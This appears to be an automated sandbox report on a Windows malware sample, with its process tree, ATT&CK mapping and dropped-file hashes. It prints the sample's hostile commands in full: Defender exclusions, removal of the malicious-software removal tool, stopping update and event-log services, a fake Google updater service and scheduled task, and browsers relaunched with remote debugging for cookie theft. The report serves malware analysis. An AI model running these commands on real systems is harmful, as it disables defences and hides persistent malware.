      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbbd22dcf8,0x7ffbbd22dd04,0x7ffbbd22dd10
      4⤵
      PID:236
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1876,i,12668610166030175126,6346541066418117400,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=1708 /prefetch:2
      4⤵
      PID:1352
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1432,i,12668610166030175126,6346541066418117400,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2228 /prefetch:11
      4⤵
      PID:5760
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2376,i,12668610166030175126,6346541066418117400,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2756 /prefetch:13
      4⤵
      PID:5908
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3128,i,12668610166030175126,6346541066418117400,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3184 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:2880
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3136,i,12668610166030175126,6346541066418117400,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3240 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:5968
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4252,i,12668610166030175126,6346541066418117400,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3788 /prefetch:9
      4⤵
      Uses browser remote debugging
      PID:1540
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4648,i,12668610166030175126,6346541066418117400,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4688 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:3748
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5352,i,12668610166030175126,6346541066418117400,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5364 /prefetch:14
      4⤵
      PID:1164
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5424,i,12668610166030175126,6346541066418117400,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5444 /prefetch:14
      4⤵
      PID:4756
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5232,i,12668610166030175126,6346541066418117400,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5532 /prefetch:14
      4⤵
      PID:3736
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5784,i,12668610166030175126,6346541066418117400,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5364 /prefetch:14
      4⤵
      PID:2884
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5776,i,12668610166030175126,6346541066418117400,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5772 /prefetch:14
      4⤵
      PID:4668
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5360,i,12668610166030175126,6346541066418117400,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5792 /prefetch:14
      4⤵
      PID:4844
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    - Drops file in Windows directory
    - Enumerates system info in registry
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    PID:2344
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x2f4,0x7ffba50af208,0x7ffba50af214,0x7ffba50af220
      4⤵
      PID:4192
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1804,i,3488708138661397920,7489684747265108533,262144 --variations-seed-version --mojo-platform-channel-handle=2184 /prefetch:11
      4⤵
      PID:4212
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2156,i,3488708138661397920,7489684747265108533,262144 --variations-seed-version --mojo-platform-channel-handle=2148 /prefetch:2
      4⤵
      PID:5896
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2280,i,3488708138661397920,7489684747265108533,262144 --variations-seed-version --mojo-platform-channel-handle=2832 /prefetch:13
      4⤵
      PID:4128
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3444,i,3488708138661397920,7489684747265108533,262144 --variations-seed-version --mojo-platform-channel-handle=3488 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:4620
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3456,i,3488708138661397920,7489684747265108533,262144 --variations-seed-version --mojo-platform-channel-handle=3492 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:1104
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\yusje" & exit
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1988
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 11
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:1436
- C:\Users\Admin\AppData\Local\wzioof\llttzcccf.exe
  "C:\Users\Admin\AppData\Local\wzioof\llttzcccf.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  PID:2864
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:3280
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:5996
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:3764
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:4412
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2264
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:5540
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:1012
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2772
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2020
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:5148
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:4260
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineK"
    3⤵
    - Launches sc.exe
    PID:5916
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineK" binpath= "C:\ProgramData\GoogleUP\Chrome\Updater.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:2348
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:4240
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineK"
    3⤵
    - Launches sc.exe
    PID:4660

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:4980

C:\Users\Admin\AppData\Roaming\service.exe
C:\Users\Admin\AppData\Roaming\service.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1604
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C schtasks /create /tn GoogleUpdaterex /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1284
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn GoogleUpdaterex /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:1020

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4628

C:\ProgramData\GoogleUP\Chrome\Updater.exe
C:\ProgramData\GoogleUP\Chrome\Updater.exe
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4936
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:4792
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:1048
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:5848
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:3236
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:5056
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:1044
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:1612
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:4976
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:6068
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:3892
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:4412
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:5288
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5216

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:2892

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Modify Authentication Process

T1556

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Modify Authentication Process

T1556

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
1a04986d6bc05730bbbfe8c0c5eeb499

SHA1
84052221402b534865379e9379d6adb43e886c69

SHA256
f7714af398e7364bc602be4c25dfb5deea91d8f505050f3c57abb2fd080c7b1c

SHA512
a4bd58b4a74a294cf2868f963085dee0a97fb24434ace40570e9873ef552685f9f992be28ad74e92ff0b87f1c8cd7ee4d57476511adc696a5a3af943e24cf61b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
80KB

MD5
16a352d5425333de472b9c0754a78efb

SHA1
68835af77fe5e5c862113dc38259595d478017f9

SHA256
bfa6c370310c7aa25019f66862ad4c8f8bb1cc55cebb8cc4edc8bd86e204dfdf

SHA512
e3a584844332e2b3501349cfaceedbbf8ae27c76f39fc27ab413ff0f57755868b798378853c834f47f32883d228ae30b0c013d2634ba265461a9420c16a405bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
8272581d8cb38484cc8cb6afbdd0d37e

SHA1
2baa96a0439003aabaad1ce5619ea0a581cf261a

SHA256
025356bf819ea8a5da44ac2c4510bc380a9448247a30665577430ca7a44ca297

SHA512
60574186c595b0018d9223afd38e59378b1b00ef4f39be17ef2d7613cdac5b8f9e6dc3f2efefd559a0e4e8d64884d6ea155e874df13f170bb6dfbb41a0104959

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\8dfbd068-7047-419b-a330-e451aba1a892.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\28dacc6d-8082-4aba-9cb9-067408b474cf\index-dir\the-real-index

Filesize
1KB

MD5
ccc22c4a1b052bea208611eb21df6942

SHA1
68726b601f7a405af5f3b527827dfbc41af0e61b

SHA256
4883d67244bc7b37907b7a9eec8c0bcc4bae54ba6ae5ddac3debc2c187e22f41

SHA512
d2cd41f7320c5a205b41f5d6af49a977e50db5ae21cb8503e9a6a38d6ee49c43352864cf3680f82cf8b96fa7bd89b0c8c2ab0374347009a2bb63e382e867c410

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\28dacc6d-8082-4aba-9cb9-067408b474cf\index-dir\the-real-index~RFe57d38c.TMP

Filesize
1KB

MD5
294555721e81c304398ae725019c770e

SHA1
730a46bb728c67f8f92839ad028f3939df26ed98

SHA256
c5a626049db5ab20b647dc9cff5e7c67d973b72bd099c04f5ad2e9420024f4c6

SHA512
e7eeb2cda818d0200d391651872244a7406f8024a6d8bbae3bb75db89a434c5a8840fa37b5872cb5fe712a11c7d6fbda00a0ad53dfecd074080342099270f8b3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
41KB

MD5
f87360a58f9e3686862b8a51eb1ca380

SHA1
aeb9f5544810d290df065599ca5594a49025b6c2

SHA256
881a5864231dc0814f186def4c919beea37ea122e3d1c97b8dc3abd11fe1b47b

SHA512
c30d1f83d08bb9f434195c0538917913b648576e68665246367deaa5228f497972de12a2ce59f2c5aec858a33b946e611ac694d7d9e2566cbd3d2d7406425070

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2e8eb51096d6f6781456fef7df731d97

SHA1
ec2aaf851a618fb43c3d040a13a71997c25bda43

SHA256
96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864

SHA512
0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0755abef639c3ab31c7314a31c7c2802

SHA1
ee90bac1c2784e561b9a8b8dcae1c4bb8dd19e7f

SHA256
eb5ca05cee810f18c8fe5f9a7b436f0c20493188449c3c2dffd573540f8331ab

SHA512
57d9a0ec8a95eae6f1a701377ee5d4fbcc9dd82ff265e88908484bed078ab5e4f04daab7eaa2a0daa0ec370c8151a415a294b487b190f0d2803f84f7fb7913a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1341538c485f016108427174050e0756

SHA1
cbd8d0e423c85c23a0e66523b0c360a0e3947795

SHA256
9a7d7c0e88e2e2ec0b53e7a0194fa49bcc5b4609f6d4c9352d04f51319e376d6

SHA512
3a5440defa51a6dfb507e62e6bd42c48a9e0f4c9a670bda51974c51da500247bac784b4aa98044d1fd87beb5c2272281da86b0b3a044102a94e6ba6c91265d5c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
793B

MD5
53618a671637ae86e239a3776198bdc3

SHA1
3d175f84b5db61578dc3bdaa3e69524143442510

SHA256
9c721917fd88c2b9b213dfa51a33f9fe670696ef9aa467a7f966d8c1721fcc4d

SHA512
5e7017df509539de144450f13ceb94bae1c69c72ca1194c66eb2c4bb3524ef53750ee50246dde3c9bc8180b48fecb6389beb6c8644f461db1f2c912932f5e312

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oumr2qvn.xj4.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir5808_1628410771\97415e5d-d4d0-4d0e-a4ff-79331c6b3abd.tmp

Filesize
152KB

MD5
dd9bf8448d3ddcfd067967f01e8bf6d7

SHA1
d7829475b2bd6a3baa8fabfaf39af57c6439b35e

SHA256
fa2232917a5656ea4f811936561ea6b7c92b3c0004c5e08ecb97636d3afc6f72

SHA512
65347df34378c2bbb34417e2cccfb3251a0b2412422cc190eed9df525b6e0a9948e0295ea3c33b3ad873ce81e369e89a138ac41d6eb7229546c3269107e661de

Download Submit
C:\Users\Admin\AppData\Local\wzioof\gganxacc.exe

Filesize
137KB

MD5
e08490aaa588933433f6b7d3ffbae613

SHA1
2b4d7cf90e3e9b41f070194bc6dd811ef60014d4

SHA256
0476c1b47571e408cdaeae24a30e481fc0955989e64791e505f7de6d391c1048

SHA512
8c67fd88a91314594137dc50a4e81deb96ffb093469cc6b04ca3c4b7e62e6f41b3dd40c47924937fbca202144958068e6c4d0b258ec4469b7f536bb37142f7c9

Download Submit
C:\Users\Admin\AppData\Local\wzioof\llttzcccf.exe

Filesize
5.1MB

MD5
cb1ab881df77d5e59c9cd71a042489dd

SHA1
948c65951d6f888dacb567d9938bb21492d82097

SHA256
23fa323eea0a8a6367e810996a54337197c1750a9a0a53c306c8c4022dd94780

SHA512
84a1030a3d2f55ad6fc576bb122d98428485986c1fe4bbd41e13ac1ce588dc3f1034fbe18139f23f9422d520815b4e437b6ac7b78960d0b6c52c56acb87f9c31

Download Submit
C:\Users\Admin\AppData\Local\wzioof\pydvp.exe

Filesize
27KB

MD5
2ff8e057084b5c180e9b447e08d2d747

SHA1
92b35c1b8f72c18dd3e945743cb93e8531d73e2b

SHA256
accdada8772018e58baa0ecb3e79c507eb09c7d67f22f59e323c74b51eac9072

SHA512
7ae542c6ca36e5ed934ca503f3489144e0ec7d81ad246af88bb525cb494f6725df0aa9131c72afe79ff02364dd65ec7a3ffb01846f99836feff06746193af251

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
3KB

MD5
00930b40cba79465b7a38ed0449d1449

SHA1
4b25a89ee28b20ba162f23772ddaf017669092a5

SHA256
eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01

SHA512
cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62

Download Submit
memory/1604-461-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/3532-518-0x00000226EAE00000-0x00000226EAE0A000-memory.dmp

Filesize
40KB

Download
memory/3532-462-0x00000226EABE0000-0x00000226EAC93000-memory.dmp

Filesize
716KB

Download
memory/3532-511-0x00000226EADB0000-0x00000226EADBA000-memory.dmp

Filesize
40KB

Download
memory/3532-460-0x00000226EABC0000-0x00000226EABDC000-memory.dmp

Filesize
112KB

Download
memory/3532-463-0x00000226EADA0000-0x00000226EADAA000-memory.dmp

Filesize
40KB

Download
memory/3532-517-0x00000226EADF0000-0x00000226EADF6000-memory.dmp

Filesize
24KB

Download
memory/3532-516-0x00000226EADC0000-0x00000226EADC8000-memory.dmp

Filesize
32KB

Download
memory/3532-512-0x00000226EAE10000-0x00000226EAE2A000-memory.dmp

Filesize
104KB

Download
memory/3532-491-0x00000226EADD0000-0x00000226EADEC000-memory.dmp

